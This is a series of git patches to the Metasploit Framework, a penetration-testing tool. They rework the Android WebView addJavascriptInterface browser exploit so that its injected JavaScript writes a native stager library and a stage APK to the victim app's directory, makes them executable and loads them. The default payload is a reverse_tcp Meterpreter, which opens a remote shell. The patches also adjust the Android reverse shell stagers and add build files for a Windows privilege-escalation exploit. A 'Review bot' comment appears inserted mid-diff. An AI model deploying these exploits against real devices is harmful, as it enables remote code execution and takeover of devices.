diff --git a/data/android/apk/res/drawable-mdpi/icon.png b/data/android/apk/res/drawable-mdpi/icon.png deleted file mode 100644 index c2e4f5634b903742c71baa0e2e080aa1ee5e2190..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 3079 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 ZRGiiSHLrJh&yw#f@jh!P{3T!B%^%F5jrsrp diff --git a/modules/payloads/stagers/android/reverse_tcp.rb b/modules/payloads/stagers/android/reverse_tcp.rb index a6adcc1f77..a2ed71120c 100644 --- a/modules/payloads/stagers/android/reverse_tcp.rb +++ b/modules/payloads/stagers/android/reverse_tcp.rb @@ -43,8 +43,6 @@ module Metasploit3 files = [ [ "AndroidManifest.xml" ], - [ "res", "drawable-mdpi", "icon.png" ], - [ "res", "layout", "main.xml" ], [ "resources.arsc" ] ] From c76924e946078e98d65ae4d2084a52691702ad59 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 25 Feb 2014 00:13:18 +0000 Subject: [PATCH 055/853] native jni stager --- .../browser/webview_addjavascriptinterface.rb | 34 +++++++++++++------ 1 file changed, 24 insertions(+), 10 deletions(-) diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 40c5461117..344403fd8e 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb 
@@ -58,9 +58,9 @@ class Metasploit3 < Msf::Exploit::Remote ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'], ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py'] ], - 'Platform' => 'linux', - 'Arch' => ARCH_ARMLE, - 'DefaultOptions' => { 'PrependFork' => true }, + 'Platform' => 'android', + 'Arch' => ARCH_DALVIK, + 'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp', }, 'Targets' => [ [ 'Automatic', {} ] ], 'DisclosureDate' => 'Dec 21 2012', 'DefaultTarget' => 0, @@ -86,6 +86,12 @@ class Metasploit3 < Msf::Exploit::Remote send_response_html(cli, html) end + def dalvikstager() + localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libdalvikstager.so') + data = File.read(localfile, {:mode => 'rb'}) + data + end + def js %Q| function exec(obj) { 
@@ -94,18 +100,26 @@ class Metasploit3 < Msf::Exploit::Remote // get the runtime so we can exec var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null); - var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}"; + var runtime = m.invoke(null, null); + var stageData = "#{Rex::Text.to_hex(payload.raw, '\\\\x')}"; + var libraryData = "#{Rex::Text.to_hex(dalvikstager, '\\\\x')}"; // get the process name, which will give us our data path - var p = m.invoke(null, null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']); + var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']); var ch, path = '/data/data/'; while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); } - path += '/#{Rex::Text.rand_text_alpha(8)}'; + var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so'; + var stagePath = path + '/stage.apk'; - // build the binary, chmod it, and execute it - m.invoke(null, null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor(); - m.invoke(null, null).exec(['chmod', '700', path]).waitFor(); - m.invoke(null, null).exec([path]); + // build the library and chmod it + runtime.exec(['/system/bin/sh', '-c', 'echo "'+libraryData+'" > '+libraryPath]).waitFor(); + runtime.exec(['chmod', '700', libraryPath]).waitFor(); + + // build the stage, chmod it, and load it + runtime.exec(['/system/bin/sh', '-c', 'echo "'+stageData+'" > '+stagePath]).waitFor(); + runtime.exec(['chmod', '700', stagePath]).waitFor(); + + runtime.load(libraryPath); return true; } From 5c2168513ac32398db0b973362834b305df657ae Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Tue, 11 Mar 2014 11:03:36 -0500 Subject: [PATCH 056/853] Update path in #dalvikstager. --- .../android/browser/webview_addjavascriptinterface.rb | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) 
diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 344403fd8e..66a4251444 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -86,10 +86,9 @@ class Metasploit3 < Msf::Exploit::Remote send_response_html(cli, html) end - def dalvikstager() - localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libdalvikstager.so') - data = File.read(localfile, {:mode => 'rb'}) - data + def dalvikstager + localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', 'libdalvikstager.so') + File.read(localfile, :mode => 'rb') end def js From 15b1a5931c866244a8af782c251b122f493bba27 Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Tue, 11 Mar 2014 11:56:05 -0500 Subject: [PATCH 057/853] Remove extra resources from android reverse_http(s). --- .../payloads/stagers/android/reverse_http.rb | 12 ++++-------- .../payloads/stagers/android/reverse_https.rb | 17 +++++------------ 2 files changed, 9 insertions(+), 20 deletions(-) diff --git a/modules/payloads/stagers/android/reverse_http.rb b/modules/payloads/stagers/android/reverse_http.rb index cafd8af906..429cb06ae9 100644 --- a/modules/payloads/stagers/android/reverse_http.rb +++ b/modules/payloads/stagers/android/reverse_http.rb @@ -1,8 +1,6 @@ ## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' 
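Review bot: The new header comment in reverse_http.rb reads `# This module requires Metasploit: http//metasploit.com/download`, which is missing the colon after `http`, so the URL is not valid as written. It should be `# This module requires Metasploit: http://metasploit.com/download`. The same line is added in the header hunk of reverse_https.rb.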
@@ -29,8 +27,8 @@ module Metasploit3 [ OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10]) ], self.class) - end - + end + def generate_jar(opts={}) host = datastore['LHOST'] ? datastore['LHOST'].to_s : String.new port = datastore['LPORT'] ? datastore['LPORT'].to_s : 8443.to_s @@ -45,8 +43,6 @@ module Metasploit3 files = [ [ "AndroidManifest.xml" ], - [ "res", "drawable-mdpi", "icon.png" ], - [ "res", "layout", "main.xml" ], [ "resources.arsc" ] ] diff --git a/modules/payloads/stagers/android/reverse_https.rb b/modules/payloads/stagers/android/reverse_https.rb index 81a5b2a7a1..a9496ebdf2 100644 --- a/modules/payloads/stagers/android/reverse_https.rb +++ b/modules/payloads/stagers/android/reverse_https.rb @@ -1,10 +1,7 @@ ## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework ## -# require 'msf/core' require 'msf/core/handler/reverse_https' @@ -18,21 +15,20 @@ module Metasploit3 super(merge_info(info, 'Name' => 'Dalvik Reverse HTTPS Stager', 'Description' => 'Tunnel communication over HTTPS', - 'Author' => 'anwarelmakrahy', + 'Author' => 'anwarelmakrahy', 'License' => MSF_LICENSE, 'Platform' => 'android', 'Arch' => ARCH_DALVIK, 'Handler' => Msf::Handler::ReverseHttps, 'Stager' => {'Payload' => ""} - )) + )) register_options( [ OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10]) ], self.class) - end - + def generate_jar(opts={}) host = datastore['LHOST'] ? datastore['LHOST'].to_s : String.new port = datastore['LPORT'] ? datastore['LPORT'].to_s : 8443.to_s 
@@ -47,8 +43,6 @@ module Metasploit3 files = [ [ "AndroidManifest.xml" ], - [ "res", "drawable-mdpi", "icon.png" ], - [ "res", "layout", "main.xml" ], [ "resources.arsc" ] ] @@ -60,5 +54,4 @@ module Metasploit3 jar end - end From 679cb03ac3140f43483853807e3021c00482042e Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Tue, 11 Mar 2014 13:09:50 -0500 Subject: [PATCH 058/853] Yank armeabi-v7a bins. --- .../android/libs/armeabi-v7a/libdalvikstager.so | Bin 13436 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 data/android/libs/armeabi-v7a/libdalvikstager.so 
diff --git a/data/android/libs/armeabi-v7a/libdalvikstager.so b/data/android/libs/armeabi-v7a/libdalvikstager.so deleted file mode 100644 index 01f47d9a3704183e404d3e7b9ee7f8ca0276b9fa..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 13436 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 Date: Tue, 11 Mar 2014 19:48:39 -0500 Subject: [PATCH 059/853] Oops. Add missing dir to dalvikstager path. --- .../exploits/android/browser/webview_addjavascriptinterface.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 66a4251444..9024a454c8 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb 
+++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote end def dalvikstager - localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', 'libdalvikstager.so') + localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', 'armeabi', 'libdalvikstager.so') File.read(localfile, :mode => 'rb') end From 41720428e4a4e417d8080db3f9dbd1398e152ae8 Mon Sep 17 00:00:00 2001 From: kyuzo Date: Wed, 12 Mar 2014 10:25:52 +0000 Subject: [PATCH 060/853] Refactoring exploit and adding build files for dll. --- .../exploits/cve-2013-1300/cve-2013-1300.sln | 20 ++++ .../cve-2013-1300.cpp} | 7 +- .../cve-2013-1300/cve-2013-1300.vcxproj | 96 +++++++++++++++++++ .../exploits/cve-2013-1300/make.msbuild | 17 ++++ external/source/exploits/make.bat | 7 ++ ...schlamperei.rb => ms13_053_schlamperei.rb} | 39 +++++--- 6 files changed, 169 insertions(+), 17 deletions(-) create mode 100755 external/source/exploits/cve-2013-1300/cve-2013-1300.sln rename external/source/exploits/cve-2013-1300/{dllmain.cpp => cve-2013-1300/cve-2013-1300.cpp} (94%) create mode 100755 external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.vcxproj create mode 100644 external/source/exploits/cve-2013-1300/make.msbuild rename modules/exploits/windows/local/{ms13_058_schlamperei.rb => ms13_053_schlamperei.rb} (74%) diff --git a/external/source/exploits/cve-2013-1300/cve-2013-1300.sln b/external/source/exploits/cve-2013-1300/cve-2013-1300.sln new file mode 100755 index 0000000000..87426cc08c --- /dev/null +++ b/external/source/exploits/cve-2013-1300/cve-2013-1300.sln 
@@ -0,0 +1,20 @@ + +Microsoft Visual Studio Solution File, Format Version 11.00 +# Visual Studio 2010 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2013-1300", "cve-2013-1300\cve-2013-1300.vcxproj", "{C093C490-61BF-433E-AEB4-80753B20DEC7}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Win32 = Debug|Win32 + Release|Win32 = Release|Win32 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {C093C490-61BF-433E-AEB4-80753B20DEC7}.Debug|Win32.ActiveCfg = Debug|Win32 + {C093C490-61BF-433E-AEB4-80753B20DEC7}.Debug|Win32.Build.0 = Debug|Win32 + {C093C490-61BF-433E-AEB4-80753B20DEC7}.Release|Win32.ActiveCfg = Release|Win32 + {C093C490-61BF-433E-AEB4-80753B20DEC7}.Release|Win32.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/external/source/exploits/cve-2013-1300/dllmain.cpp b/external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.cpp similarity index 94% rename from external/source/exploits/cve-2013-1300/dllmain.cpp rename to external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.cpp index c103e0cc26..f87ad889ae 100644 --- a/external/source/exploits/cve-2013-1300/dllmain.cpp +++ b/external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.cpp @@ -7,13 +7,16 @@ * found and exploited by nils and jon of @mwrlabs */ - #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN -#include "ReflectiveLoader.c" +#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" + // Purloined from ntstatus.h #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth +#define WIN32_NO_STATUS +#include +#undef WIN32_NO_STATUS #ifndef _NTDEF_ typedef __success(return >= 0) LONG NTSTATUS; 
diff --git a/external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.vcxproj b/external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.vcxproj new file mode 100755 index 0000000000..93f23165d9 --- /dev/null +++ b/external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.vcxproj @@ -0,0 +1,96 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + + {C093C490-61BF-433E-AEB4-80753B20DEC7} + Win32Proj + Schlamperei_DLL + + + + DynamicLibrary + true + Unicode + + + DynamicLibrary + false + true + Unicode + + + + + + + + + + + + + ../../../ReflectiveDLLInjection/common;$(IncludePath) + false + + + ../../../ReflectiveDLLInjection/common;$(IncludePath) + false + + + + Use + Level3 + Disabled + WIN32;_DEBUG;_WINDOWS;_USRDLL;SCHLAMPEREI_DLL_EXPORTS;%(PreprocessorDefinitions) + + + Windows + true + + + + + Level3 + Use + MaxSpeed + true + true + WIN32;NDEBUG;_WINDOWS;_USRDLL;SCHLAMPEREI_DLL_EXPORTS;%(PreprocessorDefinitions) + MultiThreaded + + + Windows + true + true + true + + + + + false + NotUsing + false + NotUsing + + + + + + + + + + + + + + diff --git a/external/source/exploits/cve-2013-1300/make.msbuild b/external/source/exploits/cve-2013-1300/make.msbuild new file mode 100644 index 0000000000..c18153ec01 --- /dev/null +++ b/external/source/exploits/cve-2013-1300/make.msbuild @@ -0,0 +1,17 @@ + + + + .\cve-2013-1300.sln + + + + + + + + + + + + + diff --git a/external/source/exploits/make.bat b/external/source/exploits/make.bat index 